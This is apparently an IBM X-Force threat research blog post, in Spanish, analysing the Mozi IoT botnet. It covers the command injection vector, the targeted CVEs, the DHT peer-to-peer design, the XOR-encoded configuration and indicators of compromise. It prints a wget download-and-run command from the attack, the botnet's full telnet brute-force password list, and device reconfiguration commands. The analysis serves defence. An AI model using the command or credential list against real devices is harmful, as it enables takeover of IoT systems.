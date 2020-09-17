Seguridad

Un nuevo ataque de botnet acaba de llegar a la ciudad

Mujer programadora concentrada mientras trabaja con el ordenador en la mesa de una oficina

Autor

Dave McMillen

Senior Threat Researcher

IBM X-Force

Wei Gao

Malware Reverse Engineer

Charles DeBeck

Senior Cyber Threat Intelligence Analyst - IBM

Un jugador relativamente nuevo en el campo de las amenazas, la botnet Mozi, se ha disparado entre los dispositivos de Internet de las cosas (IoT), según ha descubierto IBM® X-Force.

Este malware ha estado activo desde finales de 2019 y tiene una superposición de código con Mirai y sus variantes. Mozi representó casi el 90 % del tráfico de red IoT observado desde octubre de 2019 hasta junio de 2020.

Esta sorprendente adquisición estuvo acompañada de un enorme aumento en la actividad general de las botnets de IoT, lo que sugiere que Mozi no eliminó a los competidores del mercado. Más bien, inundó el mercado, eclipsando la actividad de otras variantes. En general, las instancias combinadas de ataques IoT desde octubre de 2019, cuando los ataques comenzaron a aumentar notablemente, hasta junio de 2020 son un 400 % más altas que las instancias combinadas de ataques IoT de los dos años anteriores.

Un gráfico del volumen de ataques de IoT desde junio de 2018 hasta mayo de 2020

Este aumento de ataques IoT podría deberse a varias causas, pero en parte puede ser el resultado de un panorama IoT en constante expansión para que los actores de amenazas puedan atacar. Hay alrededor de 31 000 millones de dispositivos IoT implementados en todo el mundo, y la tasa de implementación de IoT es ahora de 127 dispositivos por segundo.

Los atacantes llevan tiempo aprovechando estos dispositivos, sobre todo a través de la botnet Mirai. El equipo de IBM X-Force Incident Response and Intelligence Services (IRIS) lo ha estado siguiendo durante casi cuatro años. Entonces, ¿por qué el salto repentino? La investigación de IBM sugiere que Mozi sigue teniendo éxito en gran medida mediante el uso de ataques de inyección de comandos (CMDi), que a menudo resulta en la configuración incorrecta de los dispositivos IoT. El crecimiento continuo del uso de IoT y los protocolos de configuración deficientes son los posibles culpables de este salto. Este aumento puede haberse visto impulsado aún más por el acceso a redes corporativas de forma remota con mayor frecuencia debido a la COVID-19.

Los dispositivos IoT están en todas partes

Una botnet de IoT se puede utilizar para realizar ataques DDoS (denegación de servicio distribuido), robar datos y enviar spam. Existen una gran variedad de tipos diferentes de dispositivos IoT para explotar:

  • IoT para el consumidor: dispositivos domésticos, como cámaras de seguridad, control de iluminación, electrodomésticos, etc.
  • IoT comercial: dispositivos diseñados para su uso en diversos sectores. Por ejemplo, el sector sanitario dispone de marcapasos y monitores conectados a Internet. Los sectores del transporte y la construcción utilizan dispositivos asociados a rastreadores de vehículos, telemática, sistemas logísticos y cadena de suministro, y modelado de información de edificios.
  • IoT empresarial: dispositivos diseñados para su uso en oficinas, como proyectores, enrutadores, sistemas de seguridad y publicidad digital.
  • El IoT industrial: sistemas de control industrial, sistemas de automatización de líneas de producción, controladores lógicos y sistemas de aeronaves.
  • IoT de infraestructura: sistemas de gestión de ciudades inteligentes, dispositivos de control de tráfico, dispositivos de monitorización de servicios públicos, etc.
  • Internet de las cosas militares: dispositivos biométricos de combate portátiles, robots y equipos de vigilancia.

Esta gran superficie de ataque deja a las organizaciones vulnerables a botnets de IoT. A eso hay que añadir los agujeros de seguridad que estos dispositivos suelen tener listos para usar y las prácticas de endurecimiento laxas tras la implementación. La vulnerabilidad más notable en el IoT proviene de ataques CMDi.

Los ataques de CMDi lanzan la botnet Mozi

Casi todos los objetivos de IoT observados por IBM intentaron utilizar ataques CMDi para obtener acceso inicial al dispositivo. Si el endpoint objetivo era un IoT y era susceptible a estos ataques, la carga útil se descargaba y se ejecutaba.

Los ataques CMDi son extremadamente populares contra los dispositivos IoT por varias razones. En primer lugar, los sistemas integrados de IoT suelen contener una interfaz web y una interfaz de depuración sobrantes del desarrollo del firmware que pueden explotarse. En segundo lugar, los módulos PHP incorporados en las interfaces web de IoT pueden explotarse para dar a los actores maliciosos capacidad de ejecución remota. Y en tercer lugar, las interfaces de IoT suelen quedar vulnerables cuando se implementan porque los administradores no las refuerzan al sanitizar la entrada remota esperada. Esto permite a los actores de amenazas realizar entrada de comandos de shell como “wget”.

Nuestro análisis reveló que la botnet Mozi aprovecha CMDi mediante el uso de un comando de shell "wget" y, a continuación, altera los permisos para permitir que el actor de amenazas interactúe con el sistema afectado. Por ejemplo:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

Si el host fuera vulnerable a CMDi, este comando descargaría y ejecutaría un archivo llamado "mozi.a". Nuestro análisis de esta muestra en particular indica que el archivo se ejecuta en una arquitectura de microprocesador sin bloqueos en las etapas de segmentación (MIPS). Se trata de una extensión que entienden las máquinas que ejecutan una arquitectura de ordenador con conjunto de instrucciones reducido (RISC), que prevalece en muchos dispositivos IoT. Una vez que el atacante obtiene acceso completo al dispositivo a través de la botnet, se puede cambiar el nivel de firmware y se puede plantar malware adicional en el dispositivo.

Aunque este ejemplo cita un vector bien conocido, puede seguir siendo eficaz por dos razones principales. En primer lugar, las nuevas vulnerabilidades permiten la actualización constante de los intentos de explotación a través de CMDi, y se puede explotar la implementación lenta de parches. En segundo lugar, esta actividad se automatiza fácilmente, lo que permite a los actores de amenazas atacar una amplia franja de dispositivos rápidamente a bajo coste.

La infraestructura de la botnet Mozi parece proceder principalmente de China, y representa el 84 % de la infraestructura observada. Este hecho se alinea con otras investigaciones de código abierto sobre la actividad de IoT en 2020.

A continuación se muestra una lista de vulnerabilidades que IBM ha observado que la botnet Mozi intenta explotar:

VulnerabilidadDispositivo afectado
CVE-2017-17215Huawei HG532
CVE-2018-10561 / CVE-2018-10562Enrutadores GPON
CVE-2014-8361Dispositivos que utilizan Realtek SDK
Router inalámbrico RCI Eir D1000Router inalámbrico Eir D1000
CVE-2008-4873Sepal SPBOARD
CVE-2016-6277Netgear R7000 / R6400
Netgear setup.cgi RCE no autenticadoNetgear DGN1000
Ejecución de comandos MVPower DVRMVPower DVR TV-7104HE
CVE-2015-2051Dispositivos D-Link
Ejecución de comandos SOAP UPnP de D-LinkDispositivos D-Link
Proveedores de CCTV-DVR RCEMúltiples proveedores de CCTV-DVR
Análisis técnico de la botnet Mozi

La botnet Mozi es una botnet peer-to-peer (P2P) basada en el protocolo distribuido de tabla hash desordenada (DSHT), que puede propagarse mediante la explotación de dispositivos IoT y contraseñas telnet débiles.

Tras su ejecución, la botnet Mozi intenta enlazar el puerto UDP local 14737. La muestra lee /proc/net/tcp o /proc/net/raw para encontrar y eliminar los procesos que utilizan los puertos 1536 y 5888. El ejemplo comprueba si el archivo /usr/bin/python existe. Si existe, la muestra cambia su nombre de proceso a sshd. De lo contrario, la muestra lo cambia a dropbear.

Se sabe que la botnet Mozi tiene al menos dos características únicas. Utiliza ECDSA384 (algoritmo de firma digital de curva elíptica 384) para verificar su integridad. Además, reutiliza partes del código Gafgyt.

Contiene nodos públicos DHT codificados, que se pueden utilizar para unirse a la red P2P. Estos nodos son:

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

La botnet Mozi contiene cuatro capacidades principales. Puede realizar ataques DDoS (HTTP, TCP, UDP); llevar a cabo un ataque de ejecución de comandos; descargar la carga maliciosa de la URL especificada y ejecutarla; y recopilar información sobre bots.

Listado de archivos

La siguiente tabla contiene detalles de alto nivel sobre los archivos analizados. Los detalles incluyen tanto los archivos presentados como los archivos residuales. (Los archivos residuales son archivos que se extraen de forma estática o dinámica durante el análisis de malware). Los datos incluyen el nombre del archivo, la categoría del archivo determinada por el análisis, el hash del archivo y la filiación del archivo en relación con los demás archivos de la tabla.

Nombre de archivoCategoría de archivoHash de archivoPadre
mozi.mBotnet4dde761681684d7edad4e5e1ffdb940bN/A
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0aBotnet86d42d968d3d12c36722e16c78e49ffbmozi.m
mozi.aBotnet9a111588a7db15b796421bd13a949cd4N/A
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053dBotnetdd4b6f3216709e193ed9f06c37bcc3890mozi.a

Análisis de comportamiento de la botnet Mozi

Tras su ejecución, la muestra intenta enlazar el puerto UDP local 14737. La muestra lee /proc/net/tcp o /proc/net/raw para encontrar y eliminar los procesos que utilizan los puertos 1536 y 5888. El ejemplo comprueba si el archivo /usr/bin/python existe. Si existe, la muestra cambia su nombre de proceso a sshd. De lo contrario, la muestra lo cambia a dropbear:

El ejemplo comprueba si el archivo /usr/bin/python existe. Si existe, la muestra cambia el nombre de su proceso a sshd. De lo contrario, la muestra lo cambia a dropbear

La muestra también intenta actualizar la lista de control de acceso para bloquear SSH y telnet para evitar que otras botnets los utilicen.

iptables -I INPUT  -p tcp –destination-port 22 -j DROP
iptables -I INPUT  -p tcp –destination-port 23 -j DROP
iptables -I INPUT  -p tcp –destination-port 2323 -j DROP
iptables -I OUTPUT -p tcp –source-port 22 -j DROP
iptables -I OUTPUT -p tcp –source-port 23 -j DROP
iptables -I OUTPUT -p tcp –source-port 2323 -j DROP

También selecciona aleatoriamente puertos codificados en el iptable:

Captura de pantalla realizada para la entrada de blog

DHT

La botnet Mozi utiliza un protocolo DHT personalizado para desarrollar su red P2P. El proceso de cómo un nuevo nodo Mozi se une a la red DHT es el siguiente:

  • Un nuevo nodo Mozi enviará una solicitud HTTP inicial a http[:]//ia[.]51[.]la para registrarse.
  • Un nuevo nodo Mozi envía una consulta DHT find_node a ocho nodos públicos DHT codificados y conecta estos nodos para unirse a la red. Encontrar nodo se utiliza para encontrar la información de contacto de un nodo dado su ID. Estos ocho nodos públicos de DHT codificados son los siguientes:
dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

La muestra necesita generar un identificador para el nodo actual. Según un informe de 360 Netlab sobre Mozi,  el "ID es de 20 bytes y consiste en el prefijo 888888 incrustado en la muestra o el prefijo especificado por el archivo de configuración [hp], más una cadena generada aleatoriamente". El archivo de configuración se muestra a continuación:.

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

Para unirse a la red DHT, la muestra envía una consulta ping a estos nodos públicos DHT codificados. La consulta de ping con ID de nodo se muestra en el tráfico en la siguiente figura de Wireshark

La consulta de ping con ID de nodo se muestra en el tráfico de Wireshark

Análisis estático

Ambas muestras se empaquetan utilizando un packer UPX personalizado. Borra el valor de p_file_size y p_blocksize a cero en la estructura p_info.

Archivo de configuración

El ejemplo contiene un archivo de configuración codificado que se muestra a continuación:

La muestra que contiene un archivo de configuración codificado

Contiene cuatro secciones:

  • Azul: datos de configuración (428 bytes)
  • Verde: firma ECDSA384 1 (96 bytes)
  • Rojo: versión de configuración (4 bytes)
  • Negro: firma ECDSA384 2 (96 bytes)

Los datos de configuración se codifican mediante una clave XOR codificada, 4E665A8F80C8AC238DAC4706D54F6F7E. Los datos de configuración decodificados se muestran a continuación:

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

Los datos de configuración admiten varios comandos etiquetados de la siguiente manera:

Etiqueta (Comando)Descripción
[ss]Rol de bot
[ssx]habilitar/deshabilitar etiqueta [ss]
[cpu]arquitectura de CPU
[cpux]habilitar/deshabilitar etiqueta [cpu]
[nd]nuevo nodo DHT
[hp]Prefijo hash de nodo DHT
[atk]Tipo de ataque DDoS
[ver]Valor en la sección V del protocolo DHT
[sv]Actualizar configuración
[ud]Bot de actualización
[dr]Descargar y ejecutar la carga útil desde la URL especificada
[rn]Ejecutar un comando específico
[dip]ip:port para descargar el bot Mozi
[idp]informar sobre bot
[count]URL que solía informar sobre el bot

La botnet Mozi reutiliza partes del código de Gafgyt en el ataque DDoS (denegación de servicio distribuido). Admite múltiples tipos de ataques DDoS, como HTTP, TCP y UDP.

La firma ECDSA384 1 se utiliza para verificar el valor hash de los datos de configuración. La clave pública codificada que se utiliza para verificar es:

4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 
E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 
22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 
88

Está codificado con la clave XOR 4E665A8F80C8AC238DAC4706D54F6F7E. La clave pública descodificada es:

02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 
a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 
6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 
c6

La versión de configuración determina cuándo actualizar el bot. Actualizará el bot cuando este valor sea mayor que su valor actual. La firma ECDSA384 2 se utiliza para verificar estas tres primeras partes del archivo de configuración. La clave pública codificada que se utiliza para verificar es:

4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 
69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 
38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 
A1

Está codificado con la clave XOR 4E665A8F80C8AC238DAC4706D54F6F7E. La clave pública descodificada es:

02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 
27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 
76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea 
ef

Enumeración de inicios de sesión en Telnet

Además de las vulnerabilidades que explota la botnet Mozi para obtener acceso al dispositivo víctima, la botnet Mozi también puede forzar credenciales de telnet por fuerza bruta utilizando una lista codificada de credenciales:

root
admin
CUAdmin
default
rapport
super
telnetadmin
!!Huawei
keomeo
support
CMCCAdmin
e8telnet
e8ehome1
e8ehome
user
mother
Administrator
service
supervisor
guest
admin1
administrator
666666
888888
ubnt
tech
xc3511
vizxv
Pon521
e2008jl
r@p8p0r+
GM8182
gpon
Zte521
hg2x0
epicrouter
conexant
xJ4pCYeW
v2mprt
PhrQjGzk
h@32LuyD
gw1admin
adminpass
xmhdipc
juantech
@HuaweiHgw
adminHW
2010vesta
2011vesta
plumeria0077
cat1029
123456
54321
hi3518
password
12345
fucker
pass
admin1234
1111
smcadmin
1234
klv123
klv1234
zte
jvbzd
anko
zlxx
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111
meinsm

A continuación se muestra una fuerza bruta de inicio de sesión de telnet utilizada por la muestra:

Un inicio de sesión de Telnet por fuerza bruta

Indicadores

Mozi.m y Mozi.a

Red

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

Cadenas notables (unpacked)

8.8.8.8
/proc/net/route
Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/51.0.2704.79 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 como Mac OS X) AppleWebKit/600.1.4 (KHTML, como Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/46.0.2490.80 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, como Gecko) Version/9.0 Safari/601.1.56
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, como Gecko) Version/9.0.1 Safari/601.2.7
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) como Gecko
Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, como Gecko) Version/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.94 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, como Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
GET
HEAD
POST
./config
/tmp/config
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1”
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi”
iptables -I INPUT  -p tcp –destination-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 7547 -j DROP
iptables -I OUTPUT -p tcp –source-port 7547 -j DROP
[cpux]
[/cpux]
[cpu]
[/cpu]
[ssx]
[/ssx]
[ss]
[/ss]
none
[sv]
[/sv]
[rn]
[/rn]
run:
[nd]
[/nd]
/tmp
/var
/temp
iptables -I INPUT  -p udp –destination-port %d -j ACCEPT
iptables -I OUTPUT -p udp –source-port %d -j ACCEPT
iptables -I PREROUTING  -t nat -p udp –destination-port %d -j ACCEPT
iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT
0.0.0.0
[idp]
This node doesn’t accept announces
dht.transmissionbt.com:6881
router.bittorrent.com:6881
router.utorrent.com:6881
bttracker.debian.org:6881
212.129.33.59:6881
82.221.103.244:6881
130.239.18.159:6881
87.98.162.88:6881

Conclusión

El panorama de las botnets de IoT continúa cambiando y los datos de IBM Security sugieren que los actores de amenazas continúan activos en este espacio. A medida que los grupos de botnets más nuevos, como Mozi, aumentan las operaciones y la actividad general de IoT, las organizaciones que utilizan dispositivos IoT deben ser conscientes de la evolución de la amenaza. IBM ve cada vez más dispositivos IoT empresariales bajo el fuego de los atacantes. La inyección de comandos sigue siendo el vector de infección principal preferido por los actores de amenazas, reiterando la importancia de cambiar la configuración predeterminada del dispositivo y usar pruebas de penetración efectivas para encontrar y corregir las brechas en el blindaje.

Atributos de los archivos

Metadatos de Mozi.m

Nombre de archivo:Mozi.m
Tamaño del archivo:108 808
MD5:4dde761681684d7edad4e5e1ffdb940b
SHA1:2327be693bc11a618c380d7d3abc2382d870d48b
SHA256:d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
Tipo de archivo:Ejecutable ELF MSB de 32 bits, MIPS, MIPS-I versión 1 (SYSV), vinculado estáticamente, eliminado
Categoría:Botnet
Nombre de IRIS:Mozi
Otros nombres:

Mozi.a Metadata

Nombre de archivo:Mozi.a
Tamaño del archivo:95 268
MD5:9a111588a7db15b796421bd13a949cd4
SHA1:034c8c51a58be11ca620ce3eb0d43d5a59275d2f
SHA256:e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
Tipo de archivo:Ejecutable LSB ELF de 32 bits, ARM, versión 1, enlazado estáticamente, eliminado
Categoría:Botnet
Nombre de IRIS:Mozi
Otros nombres: 

5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadata

Nombre de archivo:d546_unpacked
Tamaño del archivo:266 108
MD5:86d42d968d3d12c36722e16c78e49ffb
SHA1:ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
SHA256:5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
Tipo de archivo:Ejecutable ELF MSB de 32 bits, MIPS, MIPS-I versión 1 (SYSV), vinculado estáticamente, eliminado
Categoría:Botnet
Nombre de IRIS:Mozi
Otros nombres: 

83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Metadata

Nombre de archivo:83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
Tamaño del archivo:212 464
MD5:dd4b6f3216709e193ed9f06c37bcc389
SHA1:758ba1ab22dd37f0f9d6fd09419bfef44f810345
SHA256:83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
Tipo de archivo:b'ELF de 32 bits LSB ejecutable, ARM, versión 1, estáticamente vinculado, eliminado'
Categoría:Botnet
Nombre de IRIS:Mozi
Otros nombres: 